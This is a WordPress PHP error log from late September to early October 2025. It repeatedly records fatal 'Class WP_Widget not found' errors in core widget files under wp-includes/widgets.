[23-Sep-2025 10:24:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[23-Sep-2025 10:53:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[23-Sep-2025 17:22:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[23-Sep-2025 18:19:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[23-Sep-2025 18:42:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[23-Sep-2025 20:12:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[23-Sep-2025 23:40:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[24-Sep-2025 00:33:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[24-Sep-2025 06:54:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[24-Sep-2025 09:57:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[24-Sep-2025 13:55:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[24-Sep-2025 18:11:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[24-Sep-2025 22:05:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[25-Sep-2025 09:09:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[25-Sep-2025 09:21:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[25-Sep-2025 20:53:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[26-Sep-2025 16:45:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[27-Sep-2025 01:36:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[27-Sep-2025 01:37:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[27-Sep-2025 02:56:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Sep-2025 03:21:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[27-Sep-2025 03:54:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[27-Sep-2025 04:16:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[27-Sep-2025 05:54:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[27-Sep-2025 05:54:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[27-Sep-2025 05:54:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[27-Sep-2025 07:54:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[27-Sep-2025 07:54:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[27-Sep-2025 09:06:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[27-Sep-2025 10:29:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[27-Sep-2025 10:45:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[27-Sep-2025 12:54:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[27-Sep-2025 12:54:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[27-Sep-2025 14:28:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[27-Sep-2025 15:33:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[27-Sep-2025 16:22:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[27-Sep-2025 17:17:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[27-Sep-2025 17:52:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[27-Sep-2025 20:14:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[27-Sep-2025 22:11:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[28-Sep-2025 04:23:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Sep-2025 06:36:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Sep-2025 11:49:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[28-Sep-2025 12:39:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[28-Sep-2025 17:07:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[28-Sep-2025 17:32:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[28-Sep-2025 21:43:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[28-Sep-2025 22:42:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Sep-2025 05:24:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[29-Sep-2025 13:40:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[29-Sep-2025 17:42:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[29-Sep-2025 18:55:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[29-Sep-2025 20:16:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[29-Sep-2025 23:06:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[30-Sep-2025 02:24:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[30-Sep-2025 03:32:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[30-Sep-2025 04:17:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Sep-2025 09:25:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[30-Sep-2025 15:49:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[01-Oct-2025 00:57:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[01-Oct-2025 04:12:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Oct-2025 05:22:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[01-Oct-2025 09:39:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[01-Oct-2025 15:11:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[01-Oct-2025 18:13:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[01-Oct-2025 19:13:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Oct-2025 01:00:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[02-Oct-2025 01:01:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Oct-2025 01:01:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Oct-2025 01:01:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Oct-2025 01:16:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Oct-2025 01:16:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[02-Oct-2025 01:16:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[02-Oct-2025 01:17:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Oct-2025 01:17:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[02-Oct-2025 01:17:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[02-Oct-2025 01:18:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[02-Oct-2025 01:38:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Oct-2025 01:39:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Oct-2025 02:00:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[02-Oct-2025 02:00:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Oct-2025 02:01:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Oct-2025 02:01:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Oct-2025 02:02:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Oct-2025 02:02:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Oct-2025 02:02:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[02-Oct-2025 09:21:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Oct-2025 10:19:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Oct-2025 11:30:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Oct-2025 11:48:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Oct-2025 13:42:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[02-Oct-2025 14:07:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Oct-2025 14:07:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[02-Oct-2025 14:07:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[02-Oct-2025 14:07:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Oct-2025 14:07:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Oct-2025 14:07:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Oct-2025 14:07:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
